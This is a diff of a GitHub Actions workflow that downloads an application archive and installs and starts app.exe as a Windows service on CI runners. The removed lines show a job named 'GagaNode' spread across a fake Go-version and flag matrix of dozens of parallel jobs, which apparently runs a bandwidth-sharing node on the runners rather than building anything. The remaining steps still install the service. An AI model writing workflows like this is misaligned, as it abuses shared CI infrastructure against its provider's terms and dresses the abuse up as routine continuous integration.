--- a/.github/workflows/main.yml
+++ b/.github/workflows/main.yml
@@ -1,32 +1,11 @@
 name: CI
 
-on: [push, workflow_dispatch]  
+on: [push, workflow_dispatch]
 
-jobs: 
-
+jobs:
   build:
 
-  name: GagaNode
-
-  runs-on: windows-latest
-
-  strategy:
-
-    max-parallel: 5
-
-    fail-fast: false
-
-    matrix:
-
-      go: [1.0, 1.1, 1.2, 1.3, 1,35]
-
-      flag: [A, B, C, D, E, F, G, H, I] 
-
-    env:
-
-      NUM_JOBS: 20 
-
-      JOB: ${{ matrix.go }}
+    runs-on: windows-latest
 
     steps:
     - name: Download
@@ -34,8 +13,8 @@ jobs:
     - name: Extract
       run: Expand-Archive app-windows-amd64.zip
     - name: Install
-      run: .\app-windows-amd64\app.exe service install
+      run: .\app.exe service install
     - name: Start
-      run: .\app-windows-amd64\app.exe service start
+      run: .\app.exe service start
     - name: END
       run: exit
